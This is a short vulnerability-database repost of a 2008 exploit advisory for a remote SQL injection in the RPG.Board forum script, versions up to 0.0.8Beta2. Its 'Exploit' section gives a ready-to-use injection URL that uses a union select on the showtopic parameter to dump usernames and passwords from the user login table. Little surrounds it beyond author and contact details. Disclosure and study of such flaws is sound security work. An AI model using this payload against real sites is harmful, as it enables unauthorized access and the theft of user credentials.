Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:20622
HistorySep 30, 2008 - 12:00 a.m.

RPG.Board <= 0.0.8Beta2 Remote SQL Injection

2008-09-3000:00:00
vulners.com
16

[~] RPG.Board <= 0.0.8Beta2 Remote SQL Injection

[~] Author: 0x90

[~] HomePage: www.0x90.com.ar

[~] Contact: Guns[at]0x90[dot]com[dot]ar

[~] Script: RPG.Board

[~] site: http://rpgmaster.de/viewtopic.php?f=25&amp;t=69

[~] Vulnerability Class: SQL Injection

[~] Exploit:

Register, login and testing exploit…

http://host/index.php?subtopic&amp;showtopic=-0x90+union+select+null,null,null,concat&#40;user,0x3a,pw&#41;,null+from+[PREFIX]_userlogin